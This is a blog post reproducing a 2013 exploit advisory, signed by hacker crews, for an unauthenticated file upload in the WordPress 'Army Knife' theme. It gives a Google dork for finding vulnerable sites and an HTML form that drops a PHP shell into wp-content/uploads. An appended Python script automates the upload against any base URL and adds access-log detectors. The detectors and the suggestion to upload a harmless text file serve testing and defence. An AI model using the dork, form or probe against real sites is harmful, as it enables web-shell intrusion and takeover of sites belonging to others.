Saturday, 09 November 2013

WordPress Army Knife CSRF File Upload Vulnerability

Posted by Erza Jullian, 15.57



Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability

Author: Bebyyers404

Date: 11/09/2013 (9 November 2013)

Vendor Homepage: http://freelancewp.co



Themes Link: http://freelancewp.com/wordpress-theme/army-knife/

Vulnerable File: upload-handler.php (functions/upload-handler.php inside the theme; it accepts a multipart file upload without requiring a logged-in user or a WordPress nonce)

Category: webapps/php

Google dork: inurl:/wp-content/themes/armyknife

Tested on: Windows/Linux



Exploit & PoC:

 

<form enctype="multipart/form-data"
      action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php"
      method="post">
  Please choose a file: <input name="uploadfile" type="file" /><br />
  <input type="submit" value="upload" />
</form>

 

File path (the handler stores the upload in the WordPress uploads directory for the current year and month, so the uploaded file is reachable at):

http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php
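As an added example, not part of the advisory above and not the theme's own code: a short Python script that builds the same multipart POST the HTML form sends, computes the upload URL the advisory describes, and, on the defender's side, picks out of combined-format web server access logs both POSTs to the handler and later requests for .php files under wp-content/uploads. The handler path, the uploadfile field name and the uploads layout come from the advisory; the 127.0.0.1 target, the probe filename, the boundary string and the sample log lines are constructed for the example.

```python
import re
import urllib.request
from typing import List, Optional, Tuple

# Handler path from the advisory; the WordPress root it sits under varies per site.
HANDLER_PATH = "/wp-content/themes/armyknife/functions/upload-handler.php"


def build_multipart(field: str, filename: str, content: bytes,
                    boundary: str = "----armyknife-poc") -> Tuple[bytes, str]:
    """Build the body and Content-Type header of a single-file multipart/form-data
    POST, the same request a browser sends for the HTML form in the advisory."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def expected_upload_url(base: str, filename: str, year: int, month: int) -> str:
    """URL the advisory says the file ends up at: <base>/wp-content/uploads/YYYY/MM/<name>."""
    return f"{base.rstrip('/')}/wp-content/uploads/{year:04d}/{month:02d}/{filename}"


def probe(base: str, filename: str = "poc-probe.txt", content: bytes = b"probe") -> Optional[str]:
    """Upload a harmless text file and fetch it back; return its URL if it is reachable.
    Makes network requests: run only against a site you are authorised to test."""
    from datetime import date
    body, ctype = build_multipart("uploadfile", filename, content)
    req = urllib.request.Request(base.rstrip("/") + HANDLER_PATH, data=body,
                                 headers={"Content-Type": ctype}, method="POST")
    with urllib.request.urlopen(req, timeout=10):
        pass  # the handler's own response is not needed; fetching the file is the check
    today = date.today()
    url = expected_upload_url(base, filename, today.year, today.month)
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return url if resp.read() == content else None
    except Exception:
        return None


# Defender side: request line of an Apache/Nginx combined-format access log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)')


def is_upload_attempt(line: str) -> bool:
    """True for a POST whose request path ends with the vulnerable handler."""
    m = LOG_RE.match(line)
    return bool(m and m.group("method") == "POST" and m.group("path").endswith(HANDLER_PATH))


def is_php_under_uploads(line: str) -> bool:
    """True for any request for a .php file below wp-content/uploads, where WordPress
    never places executable code itself; a hit is a strong sign of a dropped shell."""
    m = LOG_RE.match(line)
    if not m:
        return False
    path = m.group("path").split("?", 1)[0]
    return "/wp-content/uploads/" in path and path.lower().endswith(".php")


def flag_attempts(lines: List[str]) -> List[str]:
    """Return the subset of log lines that are POSTs to the handler."""
    return [line for line in lines if is_upload_attempt(line)]


# Constructed sample log lines (not real traffic): the upload, then the shell being fetched.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Nov/2013:15:57:00 +0700] "POST /wordpress/wp-content/themes/armyknife/functions/upload-handler.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Nov/2013:15:57:01 +0700] "GET /wordpress/wp-content/uploads/2013/11/yourshell.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    body, ctype = build_multipart("uploadfile", "poc-probe.txt", b"probe")
    print(ctype)
    print(body.decode())
    print(expected_upload_url("http://127.0.0.1/wordpress", "yourshell.php", 2013, 11))
    print("upload attempts:", flag_attempts(SAMPLE_LOG))
    print("php under uploads:", [l for l in SAMPLE_LOG if is_php_under_uploads(l)])
```

When confirming the issue, upload a plain text file rather than a shell: if it is retrievable at the computed URL the handler is accepting anonymous uploads, and nothing executable is left behind on the target. Note that the form needs no cookie or nonce, so the PoC works without any victim interaction; the "CSRF" in the title only becomes the relevant angle if a patched handler starts checking the session but still omits a nonce.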





./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo



JKT48 CYBER TEAM & Black Devils Crew
